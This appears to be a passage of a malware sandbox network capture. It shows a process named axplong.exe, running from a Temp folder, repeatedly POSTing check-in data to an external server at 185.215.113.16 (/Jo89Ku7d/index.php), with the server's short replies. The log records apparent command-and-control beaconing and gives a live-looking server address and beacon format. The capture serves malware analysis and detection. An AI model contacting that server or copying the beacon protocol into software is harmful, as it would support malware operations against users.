Jul 27, 2024 09:35:30.355257034 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:30.604315042 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49745	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:30.716896057 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:31.473229885 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:31.474073887 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:31.724093914 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49746	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:31.838891983 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:32.624861956 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:32.625649929 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:32.878212929 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49747	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:32.993767977 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:33.735363007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:33.736378908 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:33.992743015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49748	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:34.103075981 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:34.939901114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:34.941046000 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:35.188143015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49749	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:35.306158066 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:36.089206934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:36.090303898 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:36.343741894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49750	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:36.465075016 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:37.226320982 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:37.227679968 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:37.488029957 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49752	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:37.603837013 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:38.357083082 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:38.360198975 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:38.608216047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49753	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:38.729448080 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:39.525403976 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:39.526173115 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:39.781416893 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49754	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:39.903723001 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:40.645581961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:40.646524906 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:40.894618988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49755	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:41.009408951 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:41.798738956 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:41.800175905 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:42.064651966 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49756	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:42.181720972 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:42.935026884 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:42.935967922 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:43.186311960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49757	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:43.305984974 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:44.055516958 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:44.056828022 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
